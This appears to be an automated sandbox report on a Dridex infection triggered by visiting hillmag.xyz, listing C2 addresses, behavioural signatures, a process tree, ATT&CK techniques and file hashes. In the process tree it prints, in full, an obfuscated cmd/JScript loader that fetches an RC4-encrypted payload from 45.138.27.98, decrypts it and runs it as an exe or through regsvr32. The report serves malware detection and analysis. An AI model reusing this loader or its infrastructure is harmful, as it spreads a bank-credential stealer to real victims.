Analysis

  • max time kernel
    88s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-09-2021 23:52

General

  • Target

    http://hillmag.xyz/

  • Sample

    210930-3w5mjaafdj

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

185.168.130.138:443

79.172.255.198:9676

195.154.108.109:10172

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://hillmag.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4016 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:744
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?NDA4MDk4&uWPoFAR&ogfgafgn4=w3_QMvXcJxzQFYPJKfjcT&dsfdffg43t=6NbP07YA0SD2Izfz-3ORZzxOWPPk7LPRAOzrl6CelXXpvIkfrsCOwHp2EGILgQznYpZBFhA96n830KHyB-Z0ZSGrhCFUQhE-aLIVLI46A&sdfsdfdfg=shuffle&fhfghddfsdf=why&cxssdvxcv=121gbobs.111wn110.406y6v9a4&zonAAtTXMjAyNzQ=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://45.138.27.98/?NDA4MDk4&uWPoFAR&ogfgafgn4=w3_QMvXcJxzQFYPJKfjcT&dsfdffg43t=6NbP07YA0SD2Izfz-3ORZzxOWPPk7LPRAOzrl6CelXXpvIkfrsCOwHp2EGILgQznYpZBFhA96n830KHyB-Z0ZSGrhCFUQhE-aLIVLI46A&sdfsdfdfg=shuffle&fhfghddfsdf=why&cxssdvxcv=121gbobs.111wn110.406y6v9a4&zonAAtTXMjAyNzQ=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:1012
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c csmpp.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1244
            • C:\Users\Admin\AppData\Local\Temp\csmpp.exe
              csmpp.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:1536

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    d302a1fb716166b280c2accd4491966e

    SHA1

    9eff2394f8616a4567f3eb895747ddf81fa68207

    SHA256

    ce29369602f384184b8fc7be24fa322fe70da4590f73921eada2cf12774a4afc

    SHA512

    c2b90c30f558518426cd0135a06dfc7d1c986635a9effffa34af80a8adaf566002d17288409b838452510212f774f5b75f2772e4acc20d7b19ad6f99751dc9ea

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    ee073c523ad1149d9c66ef8b2f957fa7

    SHA1

    895b829e30af4a0b04d7a6412b1681e703d3c61b

    SHA256

    04998b65cf989b05e54bd0da0381fea630c4e51429cc193632582d4385eaa7ea

    SHA512

    df8fe5dcc42de1bfc4a250aa61df25e386cad3fe46baabe14bbe7a19d09f6e88b77b4e7df6c6c30a96956de75e5d90ca6dee89832d7bd17286ff5665128c750c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\0TDMF8RQ.cookie
    MD5

    1c1671f027cd722fab092201306f035c

    SHA1

    160c5faea3f88c3f806d35c2c0e8f4bfa6f60b0b

    SHA256

    5e7612deddbb0fc93d2060d7d0ab7ea08bd0c4335d6c978bd27d82f1cf4475a9

    SHA512

    62f3203ddbb709e5c89f956a6baa378a8f1cb32e0999792db8e8f538bf522a736eed8188ae0f15d8e2e95a9fffd1c7e6bc2c3d3d5e9752c2bd8774113bfea185

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\2DWCD7E9.cookie
    MD5

    3e51c3e210e963f3eee67dddd576970c

    SHA1

    52b30403cca124b6887aa03ad0f1c1e52adb0efe

    SHA256

    76da36aeba34362eb0ef2b919f8bc86a83fec7bf1fdad0154d6281e0373b786c

    SHA512

    e6210fec926fe295ce699cc51155a184315351c325a3692c7d5630f85d4b986b540fa5eb1adc399fc3ef346160a2db10d9ba0e37367ed466fbc38353d85d5abf

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\csmpp.exe
    MD5

    f2732682a214f0598ceaf44cc0ed346c

    SHA1

    e05362dd29050def13a63018583dd55c0cb26709

    SHA256

    724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c

    SHA512

    4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6

  • C:\Users\Admin\AppData\Local\Temp\csmpp.exe
    MD5

    f2732682a214f0598ceaf44cc0ed346c

    SHA1

    e05362dd29050def13a63018583dd55c0cb26709

    SHA256

    724532730fb3e786ce24b914f31165be171991283bcc5b550c8d4df9da786e1c

    SHA512

    4061e6510259db25fc08b0c7799668f963f4afb21145840ad34d92b32a064238a2f57b08981c85b0a804f77b4dea7872091705f17f36a2486882a689d3daaab6

  • memory/744-115-0x0000000000000000-mapping.dmp
  • memory/816-116-0x0000000000000000-mapping.dmp
  • memory/1012-117-0x0000000000000000-mapping.dmp
  • memory/1244-119-0x0000000000000000-mapping.dmp
  • memory/1536-120-0x0000000000000000-mapping.dmp
  • memory/1536-124-0x0000000000400000-0x00000000004F9000-memory.dmp
    Filesize

    996KB

  • memory/1536-123-0x0000000000660000-0x000000000069C000-memory.dmp
    Filesize

    240KB

  • memory/4016-114-0x00007FFB93850000-0x00007FFB938BB000-memory.dmp
    Filesize

    428KB